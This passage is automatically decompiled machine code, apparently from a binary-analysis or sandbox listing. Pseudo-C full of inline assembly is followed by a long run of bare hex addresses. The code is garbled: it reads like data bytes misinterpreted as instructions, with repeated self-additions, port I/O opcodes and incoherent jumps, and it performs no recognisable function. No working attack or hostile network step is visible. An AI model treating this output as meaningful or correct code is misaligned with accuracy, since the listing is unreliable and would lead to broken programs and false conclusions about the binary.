										_t709 = _t707 | 0x7f;
										 *_t1307 =  *_t1307 + 1;
										asm("outsd");
										 *_t1307 =  *_t1307 + 1;
										 *_t709 =  *_t709 + _t709;
										_t710 = _t709;
										asm("sbb al, 0x96");
										 *_t1386 =  *_t1386 + _t710;
										asm("outsd");
										 *_t1307 =  *_t1307 + 1;
										_t1155 = 1 + _t1368[0x1c];
										 *_t710 =  *_t710 + _t710;
										ds = es;
										ds = _t1406;
										_t1407 = es;
										if( *_t710 >= 0) {
											L44:
											 *_t1386 =  *_t1386 + _t710;
										} else {
											 *_t710 =  *_t710 + _t710;
											_t1155 = _t1155 | _t1368[0xf];
											 *_t710 =  *_t710 + _t710;
											_t1081 = _t710 |  *_t1307;
											asm("outsd");
											if(_t1081 >= 0) {
												 *_t1386 =  *_t1386 + _t1081;
											}
											_push(es);
											asm("sbb ch, [edi+0x44]");
											 *_t1081 =  *_t1081 + _t1081;
											_t1082 = _t1081 |  *_t1307;
											asm("outsd");
											if(_t1082 >= 0) {
												 *_t1386 =  *_t1386 + _t1082;
											}
											_push(es);
											asm("sbb [edi+0x45], ch");
											 *_t1082 =  *_t1082 + _t1082;
											_t1083 = _t1082 |  *_t1307;
											asm("outsd");
											if(_t1083 >= 0) {
												 *_t1386 =  *_t1386 + _t1083;
											}
											_push(es);
											_push(ss);
											asm("outsd");
											_t1386 = _t1386 + 1;
											 *_t1083 =  *_t1083 + _t1083;
											_t1084 = _t1083 |  *_t1307;
											asm("outsd");
											if(_t1084 != 0) {
												 *_t1386 =  *_t1386 + _t1084;
											}
											ss = es;
											asm("outsd");
											 *[ss:eax] =  *[ss:eax] + _t1084;
											_t710 = _t1084 |  *_t1307;
											asm("outsd");
											if(_t710 != 0) {
												goto L44;
											}
										}
										_push(es);
										 *(_t1155 + 0x1c) =  *(_t1155 + 0x1c) & _t1093;
										_t711 = _t1386;
										_t1387 = _t710;
										_t1157 = 1;
										 *_t1387 =  *_t1387 + _t711;
										_t712 = _t711 &  *_t711;
										_t105 = 1 + 0x16 + _t712 * 2;
										 *_t105 =  *((intOrPtr*)(1 + 0x16 + _t712 * 2)) + _t712;
										asm("sbb [esi], edx");
										if( *_t105 >= 0) {
											L52:
											_t1093 = _t1093 & _t1157;
											 *_t712 =  *_t712 + _t712;
											 *_t1368 =  *_t1368 + _t1093;
											asm("sbb [ebx+0x3c], dh");
											 *_t712 =  *_t712 + _t712;
											_t1158 = _t1157 | _t1368[0xf];
											 *_t712 =  *_t712 + _t712;
											_t713 = _t712 |  *_t1307;
											asm("outsd");
											if(_t713 != 0) {
												 *_t1387 =  *_t1387 + _t713;
											}
										} else {
											 *_t712 =  *_t712 + _t712;
											_t1158 = 0x00000001 | _t1368[0xe];
											 *_t712 =  *_t712 + _t712;
											_t713 = _t712 |  *_t1307;
											asm("outsd");
											if(_t713 != 0) {
												 *_t1387 =  *_t1387 + _t713;
												_t1462 =  *_t1387;
											}
											ds = es;
											asm("o16 pop ds");
											_push(ss);
											if(_t1462 < 0) {
												 *_t713 =  *_t713 + _t713;
												 *_t713 =  *_t713 + _t713;
												_t712 = _t713 |  *_t1307;
												asm("outsd");
												if(_t712 != 0) {
													 *_t1387 =  *_t1387 + _t712;
												}
												_push(es);
												 *0x282a961c =  *0x282a961c & _t1307;
												 *_t1387 =  *_t1387 + _t712;
												asm("outsd");
												 *_t1307 =  *_t1307 + 1;
												_t1157 = 1 + _t1368[0x1d];
												 *_t712 =  *_t712 + _t712;
												_push(es);
												goto L52;
											}
										}
										_push(es);
										asm("sbb [edi+0x3e], ebp");
										 *_t713 =  *_t713 + _t713;
										_t714 = _t713 |  *_t1307;
										asm("outsd");
										if(_t714 != 0) {
											 *_t1387 =  *_t1387 + _t714;
										}
										_push(es);
										 *(_t714 + 0x11) =  *(_t714 + 0x11) & _t1158;
										_t715 = _t1387;
										_t1388 = _t714;
										_t1160 = 1;
										 *_t1388 =  *_t1388 + _t715;
										asm("outsd");
										asm("aas");
										 *_t715 =  *_t715 + _t715;
										_t716 = _t715 |  *_t1307;
										asm("outsd");
										if(_t716 > 0) {
											 *_t1388 =  *_t1388 + _t716;
											_t1472 =  *_t1388;
										}
										ds = es;
										_push(0x1f);
										asm("aaa");
										if(_t1472 >= 0) {
											L64:
											_push(es);
											asm("sbb [edi+0x6e], ch");
											 *_t716 =  *_t716 + _t716;
											_t717 = _t716 |  *_t1307;
											asm("outsd");
											if(_t717 > 0) {
												 *_t1388 =  *_t1388 + _t717;
											}
											_push(es);
											asm("sbb ch, [edi+0x3e]");
											 *_t717 =  *_t717 + _t717;
											_t718 = _t717 |  *_t1307;
											asm("outsd");
											if(_t718 >= 0) {
												 *_t1388 =  *_t1388 + _t718;
												_t1482 =  *_t1388;
											}
											ds = es;
											_push(0x1f);
											_push(_t1407);
											if(_t1482 < 0) {
												 *_t718 =  *_t718 + _t718;
												_t1285 = _t1160 | _t1368[0xe];
												 *_t718 =  *_t718 + _t718;
												_t1079 = _t718 |  *_t1307;
												asm("outsd");
												if(_t1079 >= 0) {
													 *_t1388 =  *_t1388 + _t1079;
												}
												ds = es;
												asm("adc al, 0x1f");
												goto L72;
											}
										} else {
											 *_t716 =  *_t716 + _t716;
											_t1286 = _t1160 | _t1368[0xe];
											 *_t716 =  *_t716 + _t716;
											_t1080 = _t716 |  *_t1307;
											asm("outsd");
											if(_t1080 > 0) {
												 *_t1388 =  *_t1388 + _t1080;
											}
											_push(es);
											 *_t1388 =  *_t1388 & _t1286;
											asm("adc [esi+0x1b5282a], edx");
											 *_t1388 =  *_t1388 + _t1080;
											asm("outsd");
											 *_t1307 =  *_t1307 + _t1286;
											_t1285 = _t1286 + _t1368[0x1d];
											 *_t1080 =  *_t1080 + _t1080;
											_t1079 = _t1080 & _t1307;
											 *_t1079 =  *_t1079 + _t1079;
											 *_t1368 =  *_t1368 + _t1093;
											ss = es;
											if( *_t1368 >= 0) {
												L72:
												_pop(ds);
												asm("adc al, 0x73");
												 *_t1307 =  *_t1307 + _t1285;
												asm("outsd");
												_push(_t1307);
												 *_t1079 =  *_t1079 + _t1079;
												_t718 = _t1079 |  *_t1307;
												asm("outsd");
												if(_t718 >= 0) {
													 *_t1388 =  *_t1388 + _t718;
												}
												_push(es);
												_t1307 = _t1307 & _t1093;
												asm("sbb eax, 0xb5282a96");
												 *_t718 =  *_t718 + _t718;
												_push(es);
												asm("outsd");
												 *_t1307 =  *_t1307 + _t1285;
												_t1160 = _t1285 + _t1368[0x1e];
												 *_t718 =  *_t718 + _t718;
												ss = es;
												asm("outsd");
											} else {
												 *_t1079 =  *_t1079 + _t1079;
												_t1160 = _t1285 | _t1368[0xf];
												 *_t1079 =  *_t1079 + _t1079;
												_t716 = _t1079 |  *_t1307;
												asm("outsd");
												if(_t716 > 0) {
													 *_t1388 =  *_t1388 + _t716;
												}
												goto L64;
											}
										}
										_push(_t1093);
										 *_t718 =  *_t718 + _t718;
										_t719 = _t718 |  *_t1307;
										asm("outsd");
										if(_t719 >= 0) {
											 *_t1388 =  *_t1388 + _t719;
										}
										ds = es;
										asm("adc al, 0x1f");
										asm("adc al, 0x73");
										 *_t1307 =  *_t1307 + _t1160;
										asm("outsd");
										asm("outsd");
										if(_t719 >= 0x20a0000) {
											 *_t1388 =  *_t1388 + _t719;
										}
										_push(es);
										asm("sbb ebp, [edi+0x3e]");
										 *_t719 =  *_t719 + _t719;
										_t720 = _t719 |  *_t1307;
										asm("outsd");
										if(_t720 >= 0) {
											 *_t1388 =  *_t1388 + _t720;
										}
										_push(es);
										_push(ss);
										asm("outsd");
										_push(_t1397);
										 *_t720 =  *_t720 + _t720;
										_t721 = _t720 |  *_t1307;
										asm("outsd");
										if(_t721 == 0) {
											 *_t1388 =  *_t1388 + _t721;
										}
										_push(es);
										_t722 = _t721 & _t1093;
										 *_t722 =  *_t722 + _t722;
										 *_t1368 =  *_t1368 + _t1093;
										_push(_t1407);
										if( *_t1368 < 0) {
											 *_t722 =  *_t722 + _t722;
											_t1284 = _t1160 | _t1368[0xe];
											 *_t722 =  *_t722 + _t722;
											_t722 = _t722 |  *_t1307;
											asm("outsd");
											if(_t722 == 0) {
												 *_t1388 =  *_t1388 + _t722;
											}
											 *_t1093 =  *_t1093 & _t1307;
											asm("adc [esi+0x1b5282a], edx");
											 *_t1388 =  *_t1388 + _t722;
											asm("outsd");
											 *_t1307 =  *_t1307 + _t1284;
											_t1160 = _t1284 + _t1368[0x1e];
											 *_t722 =  *_t722 + _t722;
											ds = es;
											_t1388 = es;
											_pop(ds);
											asm("sbb al, 0x73");
											 *_t1307 =  *_t1307 + _t1160;
											asm("outsd");
											asm("outsd");
											if(_t722 == 0x20a0000) {
												 *_t1388 =  *_t1388 + _t722;
											}
											_push(es);
											asm("sbb al, 0x6f");
										}
										 *[ds:eax] =  *[ds:eax] + _t722;
										_t723 = _t722 |  *_t1307;
										asm("outsd");
										if(_t723 == 0) {
											 *_t1388 =  *_t1388 + _t723;
										}
										_push(es);
										_t724 = _t723 & _t1093;
										asm("adc [esi+0x1b5282a], edx");
										 *_t1388 =  *_t1388 + _t724;
										asm("outsd");
										_t725 = _t724 + 1;
										 *_t725 =  *_t725 + _t725;
										_t726 = _t725 |  *_t1307;
										asm("outsd");
										if(_t726 == 0) {
											 *_t1388 =  *_t1388 + _t726;
										}
										ss = es;
										asm("outsd");
										_t1161 = _t1160 + 1;
										 *_t726 =  *_t726 + _t726;
										_t727 = _t726 |  *_t1307;
										asm("outsd");
										if(_t727 == 0) {
											 *_t1388 =  *_t1388 + _t727;
										}
										_push(es);
										_push(ss);
										asm("outsd");
										_push(_t1397);
										 *_t727 =  *_t727 + _t727;
										_t732 = ((_t727 |  *_t1307) &  *(_t727 |  *_t1307)) + ((_t727 |  *_t1307) &  *(_t727 |  *_t1307)) + 0x00000001 &  *(((_t727 |  *_t1307) &  *(_t727 |  *_t1307)) + ((_t727 |  *_t1307) &  *(_t727 |  *_t1307)) + 1);
										_t125 = _t732 + 0x41;
										 *_t125 =  *((intOrPtr*)(_t732 + 0x41)) + _t1307;
										if( *_t125 >= 0) {
											L100:
											asm("outsd");
											if(_t1516 != 0) {
												 *_t1388 =  *_t1388 + _t732;
											}
											_push(es);
											asm("outsd");
											_t733 = _t732 - 1;
											 *_t733 =  *_t733 + _t733;
											_t734 = _t733 |  *_t1307;
											 *_t1368 =  *_t1368 - _t734;
											 *_t1307 =  *_t1307 + _t1161;
											_t1162 = _t1161 + _t1368[0x1c];
											 *_t734 =  *_t734 + _t734;
											asm("outsd");
											_t735 = _t734 - 1;
											 *_t735 =  *_t735 + _t735;
											_t736 = _t735 |  *_t1307;
											asm("sbb [eax], ebp");
											_t1368 = es;
											 *_t736 =  *_t736 + _t736;
											_t737 = _t736 |  *_t1307;
											_push(ss);
											 *_t737 =  *_t737 - _t737;
											 *_t1307 =  *_t1307 + _t1162;
											_t1307 = _t1307 +  *_t1388;
											 *_t1162 =  *_t1162 - _t737;
											 *_t1307 =  *_t1307 + _t1162;
										} else {
											 *_t732 =  *_t732 + _t732;
											_t1162 = _t1161 |  *_t732;
											_pop(_t1407);
											 *_t732 =  *_t732 + _t732;
											_pop(ss);
											 *_t1397 =  *_t1397 - _t1093;
											 *_t1307 =  *_t1307 + _t1162;
											_t737 = (_t732 |  *_t1307) +  *(_t732 |  *_t1307);
											 *_t737 =  *_t737 + _t737;
											 *_t1368 =  *_t1368 + _t1093;
											if( *_t1368 != 0) {
												 *_t1307 =  *_t1307 + _t1162;
												 *_t1388 =  *_t1388 - _t1093;
												 *_t1307 =  *_t1307 + _t1162;
												_t1281 = _t1162 +  *_t737;
												_t1368 =  &(_t1368[0]);
												 *_t737 =  *_t737 + _t737;
												_t1073 = _t737 |  *_t1307;
												asm("outsd");
												if(_t1073 == 0) {
													 *_t1388 =  *_t1388 + _t1073;
												}
												_push(es);
												asm("outsd");
												_t1074 = _t1073 - 1;
												 *_t1074 =  *_t1074 + _t1074;
												_t1075 = _t1074 |  *_t1307;
												 *_t1368 =  *_t1368 - _t1075;
												 *_t1307 =  *_t1307 + _t1281;
												_t1282 = _t1281 + _t1368[0x1e];
												 *_t1075 =  *_t1075 + _t1075;
												_push(es);
												asm("outsd");
												_t1076 = _t1075 - 1;
												 *_t1076 =  *_t1076 + _t1076;
												_t1077 = _t1076 |  *_t1307;
												 *_t1368 =  *_t1368 - _t1077;
												 *_t1307 =  *_t1307 + _t1282;
												_t1283 = _t1282 + _t1368[0x1d];
												 *_t1077 =  *_t1077 + _t1077;
												_push(es);
												asm("outsd");
												_t1078 = _t1077 - 1;
												 *_t1078 =  *_t1078 + _t1078;
												_t732 = _t1078 |  *_t1307;
												 *_t1368 =  *_t1368 - _t732;
												 *_t1307 =  *_t1307 + _t1283;
												_t1161 = _t1283 + _t1368[0x1d];
												_t1516 = _t1161;
												goto L100;
											}
										}
										_t738 = _t737 +  *_t737;
										asm("out dx, al");
										asm("adc [esi+0x1b5282a], edx");
										 *_t1388 =  *_t1388 + _t738;
										 *_t1093 =  *_t1093 - _t1093;
										 *_t738 =  *_t738 + _t738;
										_t739 = _t738 |  *_t1307;
										_push(ss);
										 *_t1307 =  *_t1307 - _t739;
										 *_t1307 =  *_t1307 + _t1162;
										_t1308 = _t1307 +  *_t1388;
										 *_t1093 =  *_t1093 - _t739;
										 *_t1308 =  *_t1308 + _t1162;
										_t1309 = _t1308 +  *_t1368;
										 *((intOrPtr*)(_t739 + _t739)) =  *((intOrPtr*)(_t739 + _t739)) - _t739;
										_t741 = (_t739 |  *_t1309) & _t1309;
										asm("adc [esi+0x1b5282a], edx");
										 *_t1388 =  *_t1388 + _t741;
										asm("outsd");
										 *[gs:eax] =  *[gs:eax] + _t741;
										_t742 = _t741 |  *_t1309;
										asm("outsd");
										if(_t742 >= 0) {
											 *_t1388 =  *_t1388 + _t742;
										}
										_push(es);
										asm("outsd");
										asm("o16 add [eax], al");
										_t743 = _t742 |  *_t1309;
										_push(ss);
										 *_t1368 =  *_t1368 - _t743;
										 *_t1309 =  *_t1309 + _t1162;
										_t1163 = _t1162 +  *_t743;
										_push(0x2a0a0000);
										while(1) {
											L106:
											_t1095 = _t1093 -  *_t1388 +  *((intOrPtr*)(_t1093 -  *_t1388 - 0x7c));
											 *_t743 =  *_t743 + _t743;
											_t745 = _t743 + 0x0000002a &  *_t1309;
											 *_t745 =  *_t745 + _t745;
											_t746 = _t745 + 0x2a;
											 *_t746 =  *_t746 + _t746;
											 *_t1388 =  *_t1388 + _t1095;
											_t1096 = _t1095 +  *((intOrPtr*)(_t1095 - 0x7b));
											 *_t746 =  *_t746 + _t746;
											_t748 = _t746 + 0x0000002a &  *_t1309;
											 *_t748 =  *_t748 + _t748;
											_t749 = _t748 + 0x2a;
											 *_t749 =  *_t749 + _t749;
											 *_t1388 =  *_t1388 + _t1096;
											_t1097 = _t1096 +  *((intOrPtr*)(_t1096 - 0x7a));
											 *_t749 =  *_t749 + _t749;
											_t751 = _t749 + 0x0000002a &  *_t1309;
											_t1371 = _t1368 +  *((intOrPtr*)(_t1397 - 0x7c)) +  *((intOrPtr*)(_t1397 - 0x7b)) +  *((intOrPtr*)(_t1397 - 0x7a));
											 *_t751 =  *_t751 + _t751;
											_t752 = _t751 + 0x2a;
											 *_t752 =  *_t752 + _t752;
											 *_t1388 =  *_t1388 + _t1097;
											_t1098 = _t1097 +  *((intOrPtr*)(_t1097 - 0x79));
											 *_t752 =  *_t752 + _t752;
											_t753 = _t752 + 0x2a;
											asm("adc esi, [eax]");
											while(1) {
												_t754 = _t753 +  *_t753;
												asm("aaa");
												 *_t754 =  *_t754 + _t754;
												 *_t1388 =  *_t1388 + _t754;
												while(1) {
													L108:
													_push(es);
													 *_t754 =  *_t754 + _t754;
													asm("adc [edx], eax");
													 *_t1388 =  *_t1388 + 1;
													if( *_t1388 > 0) {
														 *_t1388 =  *_t1388 + _t754;
														_t1524 =  *_t1388;
													}
													_push(es);
													if(_t1524 >= 0) {
														break;
													}
													 *_t754 =  *_t754 + _t754;
													_t1163 = _t1163 |  *_t1309;
													_t1093 = _t1098 +  *((intOrPtr*)(_t1098 - 0x79));
													 *_t754 =  *_t754 + _t754;
													_pop(es);
													_t1065 = _t754 + 0xb - 7;
													_pop(es);
													_push(es);
													asm("outsd");
													asm("insb");
													 *_t1065 =  *_t1065 + _t1065;
													_t1066 = _t1065 |  *_t1309;
													_t1368 = _t1371 +  *((intOrPtr*)(_t1397 - 0x79));
													 *_t1066 =  *_t1066 + _t1066;
													_t743 = _t1066 + 2;
													if(_t743 != 0) {
														goto L106;
													} else {
														 *_t743 =  *_t743 + _t743;
														_pop(es);
														_t1068 = _t743 + 0xb - 7;
														_pop(es);
														_push(es);
														asm("outsd");
														asm("insd");
														 *_t1068 =  *_t1068 + _t1068;
														_t1163 = _t1163 |  *_t1309;
														 *_t1388 =  *_t1388 + _t1093;
														_t1098 = _t1093 +  *((intOrPtr*)(_t1093 - 0x78));
														 *_t1068 =  *_t1068 + _t1068;
														asm("adc esi, [eax]");
														_t756 = _t1068 + 0x2a +  *((intOrPtr*)(_t1068 + 0x2a));
														asm("aaa");
														 *_t756 =  *_t756 + _t756;
														 *0x2110000 =  *0x2110000 + _t756;
														 *_t1388 =  *_t1388 + 1;
														 *_t1163 =  *_t1163;
														_push(es);
														if( *_t1163 < 0) {
															 *_t756 =  *_t756 + _t756;
															_t1163 = _t1163 |  *_t1309;
															_t1098 = _t1098 +  *((intOrPtr*)(_t1098 - 0x78));
															 *_t756 =  *_t756 + _t756;
															_pop(es);
															_pop(es);
															_push(es);
															asm("outsd");
															_t753 =  *(_t756 + 0xb - 7) * 0x3020a00;
															if(_t753 >= 0) {
																_t754 = _t753 +  *_t753;
																asm("aaa");
																 *_t754 =  *_t754 + _t754;
																 *_t1388 =  *_t1388 + _t754;
																continue;
															} else {
																 *_t753 =  *_t753 + _t753;
																_t754 = _t753 + 2;
																if(_t754 != 0) {
																	continue;
																} else {
																	break;
																}
															}
														}
													}
													L116:
													_pop(es);
													_push(es);
													asm("outsd");
													_push(0);
													 *_t1309 =  *_t1309 + _t1163;
													_t757 = _t756 -  *_t756;
													_push(ds);
													_t1164 = _t1163 +  *_t757;
													if(_t1164 < 0) {
														 *_t1388 =  *_t1388 + _t757;
													}
													_push(es);
													_t758 = _t757 -  *_t1098;
													 *_t758 =  *_t758 ^ _t1164;
													 *_t1098 =  *_t1098 + _t758;
													 *_t758 = _t758 +  *_t758;
													 *_t758 = _t758 +  *_t758;
													 *_t758 = _t758 +  *_t758;
													 *_t758 = _t758 +  *_t758;
													_push(es);
													_t758[4] = _t758[4] & _t1164 +  *((intOrPtr*)(_t1371 + 0x74));
													_t759 = _t1388;
													_t1389 = _t758;
													 *_t1389 =  *_t1389 + _t759;
													asm("outsd");
													asm("aas");
													 *_t759 =  *_t759 + _t759;
													_t760 = _t759 |  *_t1309;
													asm("outsd");
													if(_t760 > 0) {
														 *_t1389 =  *_t1389 + _t760;
													}
													ss = es;
													asm("outsd");
													_push(_t1397);
													 *_t760 =  *_t760 + _t760;
													_t761 = _t760 |  *_t1309;
													asm("outsd");
													if(_t761 == 0) {
														 *_t1389 =  *_t1389 + _t761;
													}
													_push(es);
													_push(ss);
													asm("outsd");
													_push(_t1397);
													 *_t761 =  *_t761 + _t761;
													_t762 = _t761 |  *_t1309;
													asm("outsd");
													if(_t762 >= 0) {
														 *_t1389 =  *_t1389 + _t762;
													}
													_push(es);
													 *(1 + _t1309 - 0x4ad7d56a) =  *(1 + _t1309 - 0x4ad7d56a) & _t1098;
													 *_t762 =  *_t762 + _t762;
													_push(es);
													asm("outsd");
													if ( *_t762 < 0) goto L125;
													 *_t1309 =  *_t1309 + 1;
													_t763 = _t762 -  *_t762;
													_t1539 = _t763;
													if(_t1539 > 0) {
														asm("outsd");
														if (_t1539 < 0) goto L129;
													}
													 *_t763 =  *_t763 + _t763;
												}
												 *_t754 =  *_t754 + _t754;
												_pop(es);
												_t756 = _t754 + 0xb - 7;
												goto L116;
											}
										}
									}
								}
							}
						}
						goto L5;
					}
				}
			}

0x00b58782
0x00b58782
0x00b58782
0x00b58782
0x00b58782
0x00b58784
0x00b58786
0x00b58788
0x00b5878a
0x00b5878c
0x00b5878e
0x00b58790
0x00b58791
0x00b58793
0x00b58795
0x00b58797
0x00b58799
0x00b5879f
0x00b587a5
0x00b587a6
0x00b587a6
0x00b587a6
0x00b587a8
0x00b587aa
0x00b587ab
0x00b587b2
0x00b587b4
0x00b587b5
0x00b587b7
0x00b587bc
0x00b587be
0x00b587c4
0x00b587c6
0x00b587c7
0x00b587c9
0x00b587cb
0x00b587cd
0x00b587ce
0x00b587d0
0x00b587d0
0x00b587d2
0x00b587d5
0x00b587d7
0x00b587dc
0x00b587e1
0x00b587e3
0x00b587e6
0x00b587ec
0x00b587ee
0x00b587f0
0x00b587f2
0x00b587f3
0x00b587f4
0x00000000
0x00000000
0x00b587f6
0x00b587f8
0x00b587fe
0x00b58800
0x00b58802
0x00b58806
0x00b58808
0x00b5880a
0x00b58810
0x00b58812
0x00b58816
0x00b58817
0x00b58818
0x00b58819
0x00b5881a
0x00b5881d
0x00b5881d
0x00b5881f
0x00000000
0x00000000
0x00b5881f
0x00b58821
0x00b58823
0x00b58825
0x00b5882a
0x00b5882e
0x00b58830
0x00b58831
0x00b58833
0x00b58835
0x00b5883a
0x00b5883c
0x00b5883e
0x00b58840
0x00b58842
0x00b58843
0x00b58845
0x00b58847
0x00b58849
0x00b5884b
0x00b5884d
0x00b58852
0x00b58855
0x00b58857
0x00b58859
0x00b5885b
0x00b5885d
0x00b5885f
0x00b58861
0x00b58863
0x00b58865
0x00b58866
0x00b58868
0x00b5886a
0x00b5886c
0x00b5886e
0x00b5886e
0x00b5886e
0x00000000
0x00b58871
0x00b58873
0x00b58877
0x00b58878
0x00b58879
0x00b5887b
0x00b5887d
0x00b58884
0x00b58886
0x00b58888
0x00b5888b
0x00b5888f
0x00b58891
0x00b58892
0x00b58893
0x00b5889a
0x00b5889c
0x00b5889e
0x00b588a4
0x00b588a9
0x00b588ab
0x00b588b1
0x00b588b3
0x00b588b3
0x00b588b4
0x00b588b6
0x00b588b8
0x00b588ba
0x00b588bc
0x00000000
0x00000000
0x00b588be
0x00b588c6
0x00b588c8
0x00b588cd
0x00b588cf
0x00b588d2
0x00b588d6
0x00b588d8
0x00b588da
0x00b588dc
0x00b588de
0x00b588e0
0x00b588e5
0x00b588e6
0x00b588e8
0x00b588ea
0x00b588ec
0x00b588ee
0x00b588f0
0x00b588f2
0x00b588f4
0x00b588f5
0x00b588f7
0x00b588f9
0x00b588f9
0x00b588fb
0x00b588fd
0x00b58900
0x00b58902
0x00b58904
0x00b58904
0x00b58904
0x00000000
0x00b58907
0x00b58909
0x00b5890b
0x00b5890d
0x00b5890f
0x00b58911
0x00b58913
0x00b5891a
0x00b5891c
0x00b5891e
0x00b58921
0x00b58925
0x00b58927
0x00b58928
0x00b58929
0x00b58930
0x00b58932
0x00b58934
0x00b5893a
0x00b5893d
0x00b5893f
0x00b58941
0x00b58947
0x00b5894a
0x00b5894c
0x00b5894e
0x00b58950
0x00b58952
0x00000000
0x00000000
0x00b58954
0x00b5895c
0x00b58963
0x00b58965
0x00b58966
0x00b58968
0x00b58970
0x00b58972
0x00b58974
0x00b58976
0x00b58979
0x00b5897c
0x00b5897e
0x00b58980
0x00b58982
0x00b58984
0x00b58986
0x00b58987
0x00b5898a
0x00b5898c
0x00b5898e
0x00b5898e
0x00b5898e
0x00b58991
0x00b58991
0x00000000
0x00b58993
0x00b58993
0x00b58995
0x00b58995
0x00b58991
0x00b58997
0x00b58999
0x00b5899b
0x00b5899d
0x00b589a4
0x00b589a6
0x00b589a8
0x00b589ab
0x00b589af
0x00b589b1
0x00b589b2
0x00b589b3
0x00b589ba
0x00b589be
0x00b589c4
0x00b589c9
0x00b589cb
0x00b589d1
0x00b589d4
0x00b589d6
0x00b589d8
0x00b589da
0x00b589dc
0x00000000
0x00000000
0x00b589de
0x00b589e6
0x00b589e8
0x00b589ed
0x00b589ef
0x00b589f2
0x00b589f4
0x00b589f7
0x00b589fc
0x00b589fe
0x00b589fe
0x00b58a01
0x00b58a03
0x00b58a05
0x00b58a0b
0x00b58a10
0x00b58a12
0x00b58a18
0x00b58a19
0x00b58a1b
0x00b58a21
0x00b58a22
0x00b58a24
0x00b58a2a
0x00b58a30
0x00b58a31
0x00b58a37
0x00b58a3d
0x00b58a3f
0x00b58a42
0x00b58a48
0x00b58a4a
0x00b58a4b
0x00b58a4d
0x00b58a4d
0x00b58a4d
0x00b58a4e
0x00b58a4f
0x00b58a51
0x00b58a53
0x00b58a55
0x00b58a56
0x00b58a58
0x00b58a5a
0x00b58a5d
0x00b58a5f
0x00b58a61
0x00b58a63
0x00b58a65
0x00b58a67
0x00b58a69
0x00b58a6b
0x00b58a6d
0x00b58a6f
0x00b58a72
0x00b58a74
0x00b58a76
0x00b58a76
0x00b58a77
0x00b58a79
0x00b58a7d
0x00b58a7f
0x00b58a82
0x00b58a84
0x00b58a86
0x00b58a88
0x00b58a8a
0x00b58a8c
0x00b58a8e
0x00b58a90
0x00b58a92
0x00b58a94
0x00b58a96
0x00b58a98
0x00b58a9a
0x00b58a9c
0x00b58a9e
0x00b58aa0
0x00b58aa2
0x00b58aa4
0x00b58aa6
0x00b58aa8
0x00b58aaa
0x00b58aab
0x00b58ab2
0x00b58ab4
0x00b58ab6
0x00b58ab8
0x00b58aba
0x00b58abc
0x00b58abe
0x00b58ac0
0x00b58ac7
0x00b58acc
0x00b58ace
0x00b58ad2
0x00b58ad7
0x00b58ad9
0x00b58add
0x00b58adf
0x00b58ae2
0x00b58ae4
0x00b58ae5
0x00b58ae8
0x00b58aea
0x00b58aea
0x00b58aea
0x00b58aeb
0x00b58aec
0x00b58aee
0x00b58aee
0x00b58aef
0x00b58af0
0x00b58af3
0x00b58af8
0x00b58afa
0x00b58afe
0x00b58b00
0x00b58b01
0x00b58b04
0x00b58b08
0x00b58b0d
0x00b58b0e
0x00b58b10
0x00b58b10
0x00b58b11
0x00b58b12
0x00b58b13
0x00b58b15
0x00b58b1b
0x00b58b1d
0x00b58b1f
0x00b58b21
0x00b58b25
0x00b58b27
0x00b58b28
0x00b58b29
0x00b58b2b
0x00b58b2d
0x00b58b2e
0x00b58b30
0x00b58b30
0x00b58b32
0x00b58b35
0x00b58b39
0x00b58b3b
0x00b58b3e
0x00b58b43
0x00b58b46
0x00b58b48
0x00b58b4e
0x00b58b50
0x00b58b53
0x00b58b55
0x00b58b58
0x00b58b5b
0x00b58b5d
0x00b58b5e
0x00b58b5f
0x00b58b9d
0x00b58b9d
0x00b58b61
0x00b58b61
0x00b58b63
0x00b58b66
0x00b58b68
0x00b58b6a
0x00b58b6b
0x00b58b6d
0x00b58b6d
0x00b58b6e
0x00b58b6f
0x00b58b72
0x00b58b74
0x00b58b76
0x00b58b77
0x00b58b79
0x00b58b79
0x00b58b7a
0x00b58b7b
0x00b58b7e
0x00b58b80
0x00b58b82
0x00b58b83
0x00b58b85
0x00b58b85
0x00b58b86
0x00b58b87
0x00b58b88
0x00b58b89
0x00b58b8a
0x00b58b8c
0x00b58b8e
0x00b58b8f
0x00b58b91
0x00b58b91
0x00b58b93
0x00b58b94
0x00b58b95
0x00b58b98
0x00b58b9a
0x00b58b9b
0x00000000
0x00000000
0x00b58b9b
0x00b58b9e
0x00b58b9f
0x00b58ba2
0x00b58ba2
0x00b58ba5
0x00b58ba7
0x00b58ba9
0x00b58bab
0x00b58bab
0x00b58baf
0x00b58bb1
0x00b58bea
0x00b58bea
0x00b58bec
0x00b58bee
0x00b58bf0
0x00b58bf3
0x00b58bf5
0x00b58bf8
0x00b58bfa
0x00b58bfc
0x00b58bfd
0x00b58bff
0x00b58bff
0x00b58bb3
0x00b58bb3
0x00b58bb5
0x00b58bb8
0x00b58bba
0x00b58bbc
0x00b58bbd
0x00b58bbf
0x00b58bbf
0x00b58bbf
0x00b58bc1
0x00b58bc2
0x00b58bc4
0x00b58bc5
0x00b58bc7
0x00b58bcc
0x00b58bce
0x00b58bd0
0x00b58bd1
0x00b58bd3
0x00b58bd3
0x00b58bd4
0x00b58bd5
0x00b58bdd
0x00b58bdf
0x00b58be2
0x00b58be4
0x00b58be7
0x00b58be9
0x00000000
0x00b58be9
0x00b58bc5
0x00b58c00
0x00b58c01
0x00b58c04
0x00b58c06
0x00b58c08
0x00b58c09
0x00b58c0b
0x00b58c0b
0x00b58c0c
0x00b58c0d
0x00b58c10
0x00b58c10
0x00b58c13
0x00b58c15
0x00b58c17
0x00b58c18
0x00b58c19
0x00b58c1b
0x00b58c1d
0x00b58c1e
0x00b58c20
0x00b58c20
0x00b58c20
0x00b58c22
0x00b58c23
0x00b58c25
0x00b58c26
0x00b58c61
0x00b58c61
0x00b58c62
0x00b58c65
0x00b58c67
0x00b58c69
0x00b58c6a
0x00b58c6c
0x00b58c6c
0x00b58c6d
0x00b58c6e
0x00b58c71
0x00b58c73
0x00b58c75
0x00b58c76
0x00b58c78
0x00b58c78
0x00b58c78
0x00b58c7a
0x00b58c7b
0x00b58c7d
0x00b58c7e
0x00b58c80
0x00b58c82
0x00b58c85
0x00b58c87
0x00b58c89
0x00b58c8a
0x00b58c8c
0x00b58c8c
0x00b58c8e
0x00b58c8f
0x00000000
0x00b58c8f
0x00b58c28
0x00b58c28
0x00b58c2a
0x00b58c2d
0x00b58c2f
0x00b58c31
0x00b58c32
0x00b58c34
0x00b58c34
0x00b58c35
0x00b58c36
0x00b58c38
0x00b58c3e
0x00b58c40
0x00b58c43
0x00b58c45
0x00b58c48
0x00b58c4b
0x00b58c4d
0x00b58c4f
0x00b58c51
0x00b58c52
0x00b58c90
